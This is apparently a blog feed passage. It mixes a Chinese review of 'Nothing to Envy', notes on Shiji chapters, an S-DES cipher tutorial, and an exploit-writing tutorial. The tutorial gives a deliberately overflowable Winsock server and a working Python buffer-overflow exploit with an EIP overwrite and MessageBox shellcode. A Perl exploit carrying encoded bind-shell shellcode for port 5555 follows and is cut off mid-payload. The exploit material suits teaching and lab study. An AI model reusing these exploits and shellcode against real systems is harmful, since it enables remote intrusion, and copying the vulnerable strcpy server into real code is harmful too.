<p>“总是使一个国家变成人间地狱的东西,恰恰是人们试图将其变成天堂。”这句话因为在哈耶克的名著《通往奴役之路》被引用而成为人们对极权社会最好的总结。如果说《一九八四》从理论上描述了极权社会的存在,《我们最幸福》则是实实在在让人们看到了这样一个社会的存在与运作。</p>
<p>一直以来,对于北韩的印象基本上都是来自两个方面,正经的CCTV式的新闻与鱼龙混杂的网络。前者大部分是核问题或者偶尔出来放个炮挑衅一把,而后者则还包括了对三胖的恶搞。新闻报道与各种道听途说,北韩给我的印象基本就是“贫穷”“落后””自以为是“”不自量力“等等。直到读完《我们最幸福》,才真正的从一些普通人的生活中看到了极权世界对于人们的影响,才有几次的泪流满面与不忍卒读。上一次读得这么虐心的时候还是在读《古拉格:一部历史》的时候。</p>
<p>如果看一下远东地区夜间的卫星图片,就会发现在中国、日本和南韩都闪烁着代表繁荣的亮光,显示着人们作为二十一世纪的能源消费者在各自忙碌着。而这之间却有着一个近乎英格兰大小的黑暗地带,这片处于黑暗的地区就是朝鲜民主主义人民共和国的所在,简称北韩。无论是从宏观还是微观角度看,北韩都显得如此神秘。宏观上讲,北韩这个最后的共产主义试验地,坚强地撑过了柏林墙倒塌,东欧剧变,苏联解体,中国的市场化改革,金日成去世,90年代的饥荒,两届小布什总统任期,阿拉伯之春后依然顽固存在了下来,早在上个世纪90年代就被认为北韩的覆灭是板上钉钉的事却顺利传到了第三代领导人金正恩的手中,这个顽强的独裁政权无疑是政治学者们需要研究的对象。从微观上讲,北韩普通人的生活对于外界而言更是一片空白,外国记者基本上不可能有机会访问北韩普通人,就像它的社会主义老大哥苏联当年对待访问者一样,所有的采访都是通过安排进行的,所有的参观地点都是经过精挑细选的。</p>
<p>于是,我们只能通过脱北者(从北韩逃亡南韩或者中国的人)的描述,去了解北韩人的生活,藉此也可以增加我们宏观上对北韩的了解。芭芭拉·德米克作为《洛杉矶时报》的特派记者,2001年被派往首尔,负责两韩的新闻报道。在南韩,她通过长达7年对大量脱北者的访谈,着重选取记录了6位脱北者的经历进行类似小说式的穿插叙述,将各个脱北者的生活与经历揉在一起,向我们展示了一幅朝鲜民主主义人民共和国普通百姓真实生活的画卷。书名叫做《我们最幸福》(英文名Nothing to Envy),来自北韩著名的童谣,那首歌里唱着”我们的父亲,在这个世界上,我们最幸福“。</p>
<p>6位脱北者分别是:朝鲜战争期间打到北韩的南韩士兵的女儿,美兰,因为”不洁之血“,后来好不容易成为了一个幼儿园教师;因为被北韩宣传手法所迷惑而回到北韩的日本朝侨的儿子,俊相,由于血统较好,后来去了平壤的一个科技大学读书,前途光明;早年不折不扣的共产主义信仰者宋女士;宋女士叛逆的女儿玉熙;尽心尽力的医生,金女士,父亲为了逃离中国灾难式的大跃进来到了北韩; 无家可归、火车站的流浪孤儿金赫。他们出身各异,经历各异,最终都经过各种艰辛脱离北韩到了南韩。</p>
<p>这里我只能简介一下美兰和俊相之间的凄美北韩爱情故事。美兰十二岁那年与大她三岁的俊相相识,他们花了三年时间才牵手,又花了另外六年才接吻。由于身份悬殊的关系,他们的爱情一直都在地下,即使是家都在清津每一次的见面却要找各种借口,偷偷摸摸。后来俊相去了平壤的所谓北韩的麻省理工上大学,在父母看来有着美好的前途——找到一份好工作,加入劳动党。美兰尽管出身不好,但是通过自己的努力出乎意料的被清津最好的师范学院录取。尽管他们之间只能通过最简单的书信进行交流,时间与空间也没有能吞噬这段纯美的爱情。他们的爱情非常曲折,有的时候寄的信根本没有办法收到,因为邮差把信件烧掉用来取暖。林肯说过:“最高明的骗子,可能在某个时刻欺骗所有的人,也可能所有的时刻欺骗某些人,但不可能在所有的时刻欺骗所有的人。”即使是在北韩如此洗脑的教育下,也不可能所有人都永远蒙在鼓里,因为事实就在眼前。美兰不可能眼睁睁看看孩子们挨饿却告诉他们是被祝福才身为北韩人的。美兰父亲的去世遗嘱就是让美兰一家去寻找南韩的亲人。而身为高级知识分子的俊相更是早就有了脱北的心。他深思熟虑,计划周详,悄悄听着南韩的广播,为了逃脱攒了三年的钱。美兰先于俊相脱离了苦海。虽然历经曲折,最终俊相也通过蒙古边境警察进入了南韩大使馆。</p>
<p>当再次在南韩相见时,美兰已经已经三十一岁,他们失去联系已经六年多,此时的美兰已为人妇。“如果你计划来南韩,为什么不早点来”,美兰问道。俊相回答不出这个问题。当谈话到了这个时候,美兰哭了起来,她的话暗示得很清楚。她结婚了有孩子。一切都太迟了。你可以说是他们的谨慎小心懦弱,相互之间都隐藏着北逃的想法造成了这样的凄凉结局。但是他们真的不想告诉对方吗,难道不是因为北韩无处不在的秘密警察对于人们的监视造成了即使是最亲近的人都无法把最深处的想法告诉对方吗,难道不是因为金家极权造成这样的悲剧吗。现实永远比电影更具戏剧化。</p>
<p>当成功脱离北韩,进入南韩这片应许之地后并不意味着幸福的开始。在经历了大半生的北韩生活,习惯了自己的一切都被国家所安排之后,脱北者刚来南韩时往往都会无所适从。他们必须在有着无限可能的新世界里,重新定位自己。选择在哪里居住,做什么,甚至每天早上穿什么衣服,对于我们这些习惯做选择的人来说都很困难,对于那些习惯于一生里国家替他们做所有决定的人来说,就简直像是梦魇了。南北韩之间的差距之大,据一项经常被引用的统计数据显示,北韩与南韩之间的经济差距,四倍于一九九零年两德统一时,东西德之间的差距。正是如此,有些人竟然还会怀念在北韩的生活。惯性的力量多么可怕。</p>
<p>我希望大家都能去读读这本《我们最幸福》,而不是简单的在网上嘲笑三胖,嘲笑北韩。我希望大家都能试着去理解这个悲剧的国度,去体会这个苦难民族下普通百姓的生活。</p>
《史记·殷本纪第三》笔记2014-04-21T00:00:00+00:00http://terenceli.github.io/%E7%94%9F%E6%B4%BB/2014/04/21/yinbenji
<p>史记的这篇能记的不多,是讲殷商的历史的。</p>
<p>首先说说伊尹这个人,相传伊尹为了认识汤,作为有莘氏的媵臣,也就是陪嫁奴隶,然后借着向汤做饭的机会向汤讲述做王的道理,分析天下大势。于是汤封他做了宰相。据传伊尹也是一代名厨,由厨师到宰相,这跨度还是有点大,这充分说明别拿厨师不当人才。</p>
<p>伊尹历事商朝汤、外丙、仲壬、太甲、沃丁五代帝王,为商朝立下汗马功劳。这种权臣一般都容易出问题,还好伊尹是个好人。太甲即位时,暴虐,不遵汤法,乱德。于是伊尹将其流放到了桐宫。三年之后,太甲改过自新,伊尹再次迎回太甲,帝太甲也成了一个好皇帝。</p>
<p>《殷本纪》其实记录得比较流水,大概就是x崩,y立。y崩,z立。这种格式,只有对最后一位昏君商纣介绍得比较详细。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>帝纣资辨捷疾,闻见甚敏;材力过人,手格猛兽;知足以距谏,言足以饰非;矜人臣以能,高天下以声,以为皆出己之下。
</code></pre></div></div>
<p>上面是太史公对纣的描写。单从前四句看确实是奇才,有这种资质,加上生在帝王之家,确实很容易骄傲自大,“以为皆出己之下”,这是有多狂妄。纣真的是各种荒淫无道。因为九侯的女儿不喜欢这种荒淫,竟然连累父亲被杀,鄂侯因为争论也被杀,西伯昌因为悄悄叹了一口气就被囚禁。还好昌的手下进献各种宝物才让西伯免于一死。而之后才有了武王伐纣的历史。</p>
<p>我从小遇到的聪明人不少,而正如吕老师所说,如果聪明没有办法转换成智慧,那就什么都不是。我觉得聪明的人第一点就是千万不要自大,不管是家境,智力都不应该是傲慢的资本,更不用那些技术了。不知道那些聪明的家伙现在都怎么样了。</p>
《史记·夏本纪第二》笔记2014-04-20T00:00:00+00:00http://terenceli.github.io/%E7%94%9F%E6%B4%BB/2014/04/20/xiabenji
<p>这篇读完也就结束了尧舜禹禅让的时代,进入了皇权世袭制的时代。这里记录下关于禅让与世袭的一些思考。</p>
<p>读过《五帝本纪》的人都知道,其实五帝都是一个家族的,都是黄帝的后代,但是后代为什么把这个世袭的罪责归到了禹身上。大概是因为黄帝传了后代之后,出现了尧舜禹禅让(虽然是一家人,其实关系已经很远了),而禹传启之后再也没有过禅让了,世袭成为大家所公认的制度。</p>
<p>尧死后,舜也曾经让过帝位给尧的儿子丹朱,但是当时的人们都知道舜的贤能,而不去朝见丹朱(估计丹朱也知道自己没戏),舜就自然当上了皇帝。</p>
<p>同样的情况出现在禹跟舜的儿子商均身上,禹也是假意让了一下,天下人还是去朝见禹,然后禹也当上了皇帝。</p>
<p>禹选择继承人的时候本身也没有想过自己的儿子,他先选的是皋陶,是禹时代的一个贤臣。但是不幸的是,皋陶死了。接着又选了益来掌管国家大事,但是益辅佐禹的时间并不长,并没有得到天下人的认同。禹死后,益也让位给禹的儿子启,而恰恰这个启又是一个十分贤能的人,大家就都认他,而不认益了。</p>
<p>“禹传子,家天下”的说法就来了。</p>
<p>我们回过头来看看这个禅让制,它的思想是通过在位的君主来挑选那些贤能继承自己的帝位,人本身不可能没有私心。尧舜禹可以说是做到了没有私心,但是这维持了多久呢。这再一次说明了制度的重要胜于人事。后人只需要按照制定的制度做就行,而谁能保证君主始终是一个贤君呢。</p>
<p>一个身处权力顶峰的人很容易受到人民的狂热崇拜以至于犯下错误而不自知,我第一次读到“皋陶于是敬禹之德,令民皆则禹。不如言,刑从之。”这句话的时候还是震惊了一下的,不顺从他说的,就要受刑罚。这不是一个黑暗的社会吗。美国在罗斯福之前总统不超过两届的习惯是大家效仿开国之父华盛顿的两届离职,而罗斯福因为经济危机和二战连任四届总统,似乎也是无可厚非。然而美国在战后还是通过修宪制定了总统任期不能超过两届的修正案。</p>
<p>这是一种对制度的信任。</p>
Simplified DES简介2014-04-17T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/04/17/SDES
<!--script type="text/javascript" src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=default"-->
<!-- mathjax config similar to math.stackexchange -->
<script src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS_HTML" type="text/javascript"></script>
<p>Simplified DES是由Edward Schaefer教授开发的用于教学的简单加密算法,它与DES有着相似的属性与结构,只是参数比较小而已。通过这种简单的、能够手工加解密的算法,能让我们加深对DES的理解。</p>
<h3>概述</h3>
<p>图1是simplified DES(下称S-DES)的总体结构图。S-DES加密算法使用8位明文(如10111101)和10位密钥作为输入,产生8位密文。相反地,S-DES解密算法使用8位密文和相同的10位密钥作为输入,产生8位明文。</p>
<p><img src="/assets/img/sdes/1.png" alt="" /></p>
<p>加密算法包括5个函数:初始的置换函数(\(IP\));一个复杂的函数\(f{}_{k}\),这个函数包括取决于输入的置换和替换操作;一个简单的置换函数\(SW\),用于交换输入数据的前后两个部分;然后又是\(f{}_{k}\);最后是初始置换函数的逆(\(IP{}^{-1}\))。</p>
<p>\(f{}_{k}\)的输入包括明文和8位密钥,我们可以使用16位的密钥,每一轮使用8位(共两轮\(f{}_{k}\)),也可以使用8位密钥,每一次都使用相同的密钥。作为折中,我们使用了10位密钥,每一次的\(f{}_{k}\)通过移位产生8位密钥。两个密钥的产生如图2:</p>
<p><img src="/assets/img/sdes/2.png" alt="" /></p>
<p>这个算法中,密钥首先通过一个置换函数(\(P10\))。然后左移一位,输出通过一个置换函数(\(P8\)),产生第一个密钥\(K_{1}\)。左移一位之后的结果再进行移位和置换(\(P8\)),产生第二个密钥\(K_{2}\)。</p>
<p>我们将S-DES的加密算法使用函数组合表达如下:</p>
\[IP^{-1}\circ f_{K_{2}}\circ SW\circ f_{K_{1}}\circ IP\]
<p>也就是</p>
\[ciphertext = IP^{-1}(f_{K_{2}}(SW(f_{K_{1}}(IP(plaintext)))))\]
<p>其中</p>
\[K_{1} = P8(Shift(P10(key)))\]
\[K_{2} = P8(Shift(Shift(P10(key))))\]
<p>解密算法也在图1中,可以表示成加密算法的逆运算。</p>
\[plaintext = IP^{-1}(f_{K_{1}}(SW(f_{K_{2}}(IP(ciphertext)))))\]
<h3>S-DES密钥生成</h3>
<p>图2显示了子密钥的生成。</p>
<p>首先,按照一定方式对输入密钥进行置换。如输入的10位密钥是\((k_{1},k_{2},k_{3},k_{4},k_{5},k_{6},k_{7},k_{8},k_{9},k_{10})\)。 \(P10\)如下定义:</p>
\[P10(k_{1},k_{2},k_{3},k_{4},k_{5},k_{6},k_{7},k_{8},k_{9},k_{10}) = (k_{3},k_{5},k_{2},k_{7},k_{4},k_{10},k_{1},k_{9},k_{8},k_{6})\]
<p>P10可以简单表示如下:</p>
<p><img src="/assets/img/sdes/3.png" alt="" /></p>
<p>这个表的意思就是说第一个输出是输入的第3位,第二个输出是输入的第5位,以此类推。如,密钥1010000010被置换成1000001100。</p>
<p>接下来进行循环左移一位(LS-1),是将密钥分成左右两部分(每部分5位),左右各循环左移一位。这个例子中,得到00001 11000.</p>
<p>接着执行\(P8\),从10位输出中选出8位密钥,P8定义如下:</p>
<p><img src="/assets/img/sdes/4.png" alt="" /></p>
<p>结果就是第一个子密钥(\(K_{1}\)),在我们这个例子中,是10100100。</p>
<p>然后对第一次左移产生的那对5位数据(00001 11000)再循环左移两位。这个例子中的结果是00100 00011。最后,将其通过P8产生\(K_{2}\)。这个例子中是01000011。</p>
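上面的密钥生成过程可以直接写成Python来验证(P8在原文中以图片给出,这里采用Schaefer论文中的标准定义P8=(6,3,7,4,8,5,10,9),仅为教学示意):

```python
P10 = (3, 5, 2, 7, 4, 10, 1, 9, 8, 6)
P8  = (6, 3, 7, 4, 8, 5, 10, 9)   # 原文P8以图片给出,这里取标准定义

def permute(bits, table):
    # 置换表采用1下标:输出的第i位是输入的第table[i]位
    return [bits[i - 1] for i in table]

def ls(half, n):
    # 对5位的一半循环左移n位
    return half[n:] + half[:n]

def sdes_keys(key):
    # key: 由10个0/1组成的列表,返回两个8位子密钥K1、K2
    t = permute(key, P10)
    l, r = ls(t[:5], 1), ls(t[5:], 1)     # LS-1
    k1 = permute(l + r, P8)
    l, r = ls(l, 2), ls(r, 2)             # 再LS-2
    k2 = permute(l + r, P8)
    return k1, k2
```

用正文例子中的密钥1010000010运行,可以复现K1=10100100和K2=01000011。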
<h3>S-DES加密</h3>
<p>图3展示了S-DES加密算法的细节。这部分详细介绍加密流程中的5个函数。</p>
<p><img src="/assets/img/sdes/5.png" alt="" /></p>
<p>初始和结尾的置换函数:</p>
<p>对于输入的8位明文,我们需要使用\(IP\)对其进行重新置换:</p>
<p><img src="/assets/img/sdes/6.png" alt="" /></p>
<p>在算法末尾,需要进行相反的操作:</p>
<p><img src="/assets/img/sdes/7.png" alt="" /></p>
<p>可以验证\(IP^{-1}(IP(X)) = X\)。</p>
<p>\(f_{K}\)函数:</p>
<p>S-DES中最复杂的部分就是函数\(f_{K}\)了,这个函数包含了置换的和替换的组合。这个函数解释如下。首先让L和R分别表示\(f_{K}\)8位输入的左边4位和右边4位,F是一个4位到4位的映射。则</p>
\[f_{K}(L,R) = (L\oplus F(R,SK),R)\]
<p>SK是一个子密钥。</p>
<p>下面解释F。它的输入是4位数\((n_{1} n_{2} n_{3} n_{4})\),第一个操作是扩展与置换:</p>
<p><img src="/assets/img/sdes/8.png" alt="" /></p>
<p>为了方便起见,写成如下形式:</p>
<p><img src="/assets/img/sdes/9.png" alt="" /></p>
<p>将8位的子密钥\(K_{1} = (k_{11},k_{12},k_{13},k_{14},k_{15},k_{16},k_{17},k_{18})\)与上面的数进行异或:</p>
<p><img src="/assets/img/sdes/10.png" alt="" /></p>
<p>重新命名这8个数:</p>
<p><img src="/assets/img/sdes/11.png" alt="" /></p>
<p>前面4位用于在第一个S盒产生一个2位输出,后面4位在第二个S盒产生一个2位输出,两个S盒定义如下:</p>
<p><img src="/assets/img/sdes/12.png" alt="" /></p>
<p>S盒操作如下:第一个和第四个输入作为一个2位数指定S盒中的一行,第二和第三个输入作为一个2位数指定S盒中的一列。比如\((p_{0,0}p_{0,3})=(00)\) 和\((p_{0,1}p_{0,2})=(10)\) ,则输出是S盒的第一行第二列这里是3(二进制的11),类似的\((p_{1,0}p_{1,3})\) 和\((p_{1,1}p_{1,2})\)的值找到在第二个S盒中的值。</p>
<p>接着,由两个S盒产生的4位输出通过一个置换函数\(P4\):</p>
<p>\(P4\)的输出就是F的输出。</p>
<p>SW函数:</p>
<p>\(f_{K}\)函数仅仅改变了输入左边的4位。SW函数将输入的左右两半互换,这样第二轮的\(f_{K}\)处理的就是另外4位。第二轮的\(f_{K}\)中,E/P、S0、S1和P4都跟第一轮一样,只是子密钥换成了\(K_{2}\)。</p>
<p>在网上找到了一个S-DES的例子,希望大家能自己走一遍流程。</p>
<p><a href="/assets/file/mimaxue/SDES.pdf">S-DES</a></p>
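把各个部件拼起来就是完整的S-DES。IP、E/P、P4和两个S盒在原文中以图片给出,下面采用的是通行的标准表;解密只是按相反顺序使用两个子密钥,可以验证它正好是加密的逆运算(教学示意实现):

```python
# 标准S-DES各置换表(对应原文图片,此处取通行定义,均为1下标)
P10 = (3, 5, 2, 7, 4, 10, 1, 9, 8, 6)
P8  = (6, 3, 7, 4, 8, 5, 10, 9)
IP  = (2, 6, 3, 1, 4, 8, 5, 7)
IPi = (4, 1, 3, 5, 7, 2, 8, 6)        # IP的逆
EP  = (4, 1, 2, 3, 2, 3, 4, 1)        # 扩展/置换 E/P
P4  = (2, 4, 3, 1)
S0  = ((1, 0, 3, 2), (3, 2, 1, 0), (0, 2, 1, 3), (3, 1, 3, 2))
S1  = ((0, 1, 2, 3), (2, 0, 1, 3), (3, 0, 1, 0), (2, 1, 0, 3))

def permute(bits, table):
    return [bits[i - 1] for i in table]

def ls(h, n):
    return h[n:] + h[:n]

def subkeys(key):
    t = permute(key, P10)
    l, r = ls(t[:5], 1), ls(t[5:], 1)
    k1 = permute(l + r, P8)
    k2 = permute(ls(l, 2) + ls(r, 2), P8)
    return k1, k2

def F(r, sk):
    t = [a ^ b for a, b in zip(permute(r, EP), sk)]
    a = S0[t[0] * 2 + t[3]][t[1] * 2 + t[2]]   # 第1、4位选行,第2、3位选列
    b = S1[t[4] * 2 + t[7]][t[5] * 2 + t[6]]
    return permute([a >> 1, a & 1, b >> 1, b & 1], P4)

def fk(bits, sk):
    l, r = bits[:4], bits[4:]
    return [x ^ y for x, y in zip(l, F(r, sk))] + r

def sdes(block, key, decrypt=False):
    k1, k2 = subkeys(key)
    ka, kb = (k2, k1) if decrypt else (k1, k2)
    t = fk(permute(block, IP), ka)
    t = fk(t[4:] + t[:4], kb)                  # SW之后再来一轮fk
    return permute(t, IPi)
```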
《史记·五帝本纪第一》笔记2014-04-15T00:00:00+00:00http://terenceli.github.io/%E7%94%9F%E6%B4%BB/2014/04/15/wudibenji
<p>最近因为在Coursera上面跟台大吕世浩老师的《史记》,自己准备重新认真学习一下史记。在这里做些笔记。</p>
<p>《史记》是我在高中的时候看的,当时关注的是优美的文字与故事情节,现在听了吕世浩老师的课,觉得很有必要重新看一遍,
然后自己买了三家注的《史记》,繁体竖版,质量好,很值得收藏啊。</p>
<p>上周周末把《史记》第一篇《五帝本纪第一》看完了,在这里做个总结。</p>
<p>首先五帝的关系如下图所示:</p>
<p><img src="/assets/img/wudibenji/1.PNG" alt="" /></p>
<p>图中红色字体表示的就是五帝。</p>
<p>黄帝:不用多说了,所谓的炎黄子孙中的黄就是他。黄帝通过阪泉之战战胜了炎帝,通过逐鹿之战战胜了蚩尤,得有天下。</p>
<p>高阳:就是颛顼了。</p>
<p>高辛:就是帝喾。</p>
<p>放勋:帝尧,他哥挚当皇帝不行,他就上了。</p>
<p>重华:帝舜,帝尧到帝舜这都隔了多少代了,神话还是神话啊。</p>
<p>尧舜禅让历来为人们所乐道,部落联盟推举制度也是自古就有的。尧舜禅让与部落联盟推举天子的制度至少有三方面的不同。</p>
<p>生让:其他部落联盟推举天子都是前一任的天子死掉,大家再决定下一任的继承者,尧舜都是活着就在找人了;</p>
<p>侧陋:是说尧找继承人的时候不是说一定要身边的贵族,即使是民间隐匿者也可以是,只要你有能力;</p>
<p>试可:这是最重要的,因为是生让,所以才可以试可,在活着的时候就要多方考验这个人,看这个人足不足以担当大任。</p>
<p>这是三个最重要的不同,也是中国文化的精神。这种精神是说天下乃是重器,不可轻易授之于人。所谓“夫天下至重也”。因为至重,交给一个人的时候一定要格外小心,不能够有自己的私心,也要多方考验,这个人是否足以承担大任。这就是中国人禅让真正的思想。</p>
<p>五帝本纪上说:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>自黄帝至舜、禹,皆同姓而异其国号,以章明德。故黄帝为有熊,帝颛顼为高阳,帝喾为高辛,帝尧为陶唐,帝舜为有虞。帝禹为夏后而别氏,姓姒氏。契为商,姓子氏。弃为周,姓姬氏。
</code></pre></div></div>
<p>这段话是说夏商周三代以前的历代帝王全都是黄帝的子孙。司马迁以此找出一个天下一家的来源,相信所有的人都有共同的来源,太史公所以以黄帝为中华民族的始祖,就是这个原因。</p>
<p>自古三皇五帝就有很多传说,《尚书》记载的是尧以来的事,百家言黄帝各有各的说法,那个时候各种传说流传,缙绅也不知道怎么评价黄帝。作为历史学家的司马迁怎么办呢?</p>
<p>“余尝西至空桐,北过涿鹿,东渐於海,南浮江淮矣,至长老皆各往往称黄帝、尧、舜之处,风教固殊焉,总之不离古文者近是。”</p>
<p>司马迁于是走访各处,访问当地的人民,查阅古籍,得出了“不离古文者近是”的结论。司马迁写下一句意味深长的话:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>非好学深思,心知其意,固难为浅见寡闻道也。
</code></pre></div></div>
<p>太史公为了后来读《史记》的人确立一个阅读的基本原则:要读懂我这本书,一定要是好学深思,心知其意的人。</p>
<p>读完《五帝本纪》需要注意一个现象,整篇文章只言治不言乱,并不是因为太史公捏造事实,而是太史公觉得这是中国最好的政治理想,而且他相信这个理想曾经是存在过的。</p>
exploit编写笔记3——编写Metasploit exploit2014-04-08T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/04/08/metasploit
<p>这是exploit编写笔记第三篇,编写metasploit exploit。
首先,编写一个带有缓冲区溢出漏洞的服务器端程序。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// server.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include <iostream.h>
#include <winsock.h>
#include <windows.h>
//load windows socket
#pragma comment(lib, "wsock32.lib")
//Define Return Messages
#define SS_ERROR 1
#define SS_OK 0
void pr( char *str)
{
char buf[500]="";
strcpy(buf,str);
}
void sError(char *str)
{
MessageBox (NULL, str, "socket Error" ,MB_OK);
WSACleanup();
}
int main(int argc, char **argv)
{
WORD sockVersion;
WSADATA wsaData;
int rVal;
char Message[5000]="";
char buf[2000]="";
u_short LocalPort;
LocalPort = 200;
//wsock32 initialized for usage
sockVersion = MAKEWORD(1,1);
WSAStartup(sockVersion, &wsaData);
//create server socket
SOCKET serverSocket = socket(AF_INET, SOCK_STREAM, 0);
if(serverSocket == INVALID_SOCKET)
{
sError("Failed socket()");
return SS_ERROR;
}
SOCKADDR_IN sin;
sin.sin_family = PF_INET;
sin.sin_port = htons(LocalPort);
sin.sin_addr.s_addr = INADDR_ANY;
//bind the socket
rVal = bind(serverSocket, (LPSOCKADDR)&sin, sizeof(sin));
if(rVal == SOCKET_ERROR)
{
sError("Failed bind()");
WSACleanup();
return SS_ERROR;
}
//get socket to listen
rVal = listen(serverSocket, 10);
if(rVal == SOCKET_ERROR)
{
sError("Failed listen()");
WSACleanup();
return SS_ERROR;
}
//wait for a client to connect
SOCKET clientSocket;
clientSocket = accept(serverSocket, NULL, NULL);
if(clientSocket == INVALID_SOCKET)
{
sError("Failed accept()");
WSACleanup();
return SS_ERROR;
}
int bytesRecv = SOCKET_ERROR;
while( bytesRecv == SOCKET_ERROR )
{
//receive the data that is being sent by the client max limit to 5000 bytes.
bytesRecv = recv( clientSocket, Message, 5000, 0 );
if ( bytesRecv == 0 || bytesRecv == WSAECONNRESET )
{
printf( "\nConnection Closed.\n");
break;
}
}
//Pass the data received to the function pr
pr(Message);
//close client socket
closesocket(clientSocket);
//close server socket
closesocket(serverSocket);
WSACleanup();
return SS_OK;
}
</code></pre></div></div>
<p>Sending more than 500 bytes to this service crashes it: the 500-byte <code>buf</code> in <code>pr()</code> is overflowed by <code>strcpy</code>. The following Python script triggers the crash:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import socket
data = 'A' * 1000
s= socket.socket()
s.connect(('localhost',200))
s.send(data)
s.close()
</code></pre></div></div>
<p><img src="/assets/img/metasploit/1.png" alt="" /></p>
<p>Using mona's pattern commands, the EIP overwrite offset is determined to be 504.</p>
<p><img src="/assets/img/metasploit/2.png" alt="" /></p>
<p><img src="/assets/img/metasploit/3.png" alt="" /></p>
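The mona pattern workflow used above is built on Metasploit's cyclic pattern. As a sketch of the underlying idea (this mimics, but is not, mona itself), the following Python reproduces the upper/lower/digit triple pattern and looks up the offset of the four bytes that landed in EIP:

```python
import string

def pattern_create(length):
    # Metasploit-style cyclic pattern: Upper, lower, digit triples
    out = []
    for u in string.ascii_uppercase:
        for l in string.ascii_lowercase:
            for d in string.digits:
                out.append(u + l + d)
                if len(out) * 3 >= length:
                    return ''.join(out)[:length]
    return ''.join(out)[:length]

def pattern_offset(eip_bytes, length=2000):
    # eip_bytes: the 4 pattern characters read out of EIP at crash time
    return pattern_create(length).find(eip_bytes)

pattern = pattern_create(1000)
# The 4 pattern characters that land in EIP pinpoint the overwrite offset
print(pattern_offset(pattern[504:508]))  # -> 504
```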
<p>Next we look for a <code>push esp; ret</code> sequence; the one we use is at 71a22b53, and we overwrite EIP with this value. For the shellcode we use a simple MessageBox payload.</p>
<p>This gives the following Python script:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import socket
data = "A" * 504
#71a22b53
data += "\x53\x2b\xa2\x71"
shellcode = ("\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B"
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9"
"\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C"
"\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0"
"\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B"
"\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72"
"\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"
"\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47"
"\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F"
"\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72"
"\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66"
"\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14"
"\x8E\x03\xD3\x52\x33\xFF\x57\x68\x61\x72"
"\x79\x41\x68\x4C\x69\x62\x72\x68\x4C\x6F"
"\x61\x64\x54\x53\xFF\xD2\x68\x33\x32\x01"
"\x01\x66\x89\x7C\x24\x02\x68\x75\x73\x65"
"\x72\x54\xFF\xD0\x68\x6F\x78\x41\x01\x8B"
"\xDF\x88\x5C\x24\x03\x68\x61\x67\x65\x42"
"\x68\x4D\x65\x73\x73\x54\x50\xFF\x54\x24"
"\x2C\x57\x68\x4F\x5F\x6F\x21\x8B\xDC\x57"
"\x53\x53\x57\xFF\xD0\x68\x65\x73\x73\x01"
"\x8B\xDF\x88\x5C\x24\x03\x68\x50\x72\x6F"
"\x63\x68\x45\x78\x69\x74\x54\xFF\x74\x24"
"\x40\xFF\x54\x24\x40\x57\xFF\xD0")
data+=shellcode
s= socket.socket()
s.connect(('localhost',200))
s.send(data)
s.close()
</code></pre></div></div>
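The byte string "\x53\x2b\xa2\x71" used to overwrite EIP is simply the address 0x71a22b53 written in x86 little-endian byte order; this small sketch (not part of the original exploit) makes the relationship explicit with struct.pack:

```python
import struct

# x86 stores multi-byte values least-significant byte first, so the
# return address must be byte-reversed in the overflow buffer.
ret = struct.pack('<I', 0x71a22b53)
assert ret == b'\x53\x2b\xa2\x71'

# The overflow buffer then starts as: 504 filler bytes + packed EIP
data = b'A' * 504 + ret
assert data[504:508] == ret
```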
<p>It runs successfully:</p>
<p><img src="/assets/img/metasploit/4.png" alt="" /></p>
<p>Next we use a port-binding payload; the one below binds a shell to TCP port 5555:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#
print " --------------------------------------\n";
print " Writing Buffer Overflows\n";
print " Peter Van Eeckhoutte\n";
print " http://www.corelan.be:8800\n";
print " --------------------------------------\n";
print " Exploit for vulnserver.c\n";
print " --------------------------------------\n";
use strict;
use Socket;
my $junk = "\x90" x 504;
#jmp esp (from ws2_32.dll)
my $eipoverwrite = pack('V',0x71a22b53);
#add some NOP's
my $shellcode="\x90" x 50;
# windows/shell_bind_tcp - 702 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, LPORT=5555, RHOST=
$shellcode=$shellcode."\x89\xe0\xd9\xd0\xd9\x70\xf4\x59\x49\x49\x49\x49\x49\x43" .
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58" .
"\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42" .
"\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30" .
"\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x42\x4a" .
"\x4a\x4b\x50\x4d\x4d\x38\x4c\x39\x4b\x4f\x4b\x4f\x4b\x4f" .
"\x45\x30\x4c\x4b\x42\x4c\x51\x34\x51\x34\x4c\x4b\x47\x35" .
"\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x44\x38\x45\x51\x4a\x4f" .
"\x4c\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x47\x50\x43\x31" .
